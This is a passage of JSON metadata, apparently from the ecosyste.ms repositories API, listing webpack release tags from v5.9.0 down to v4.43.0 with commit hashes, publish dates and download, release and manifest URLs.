os.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.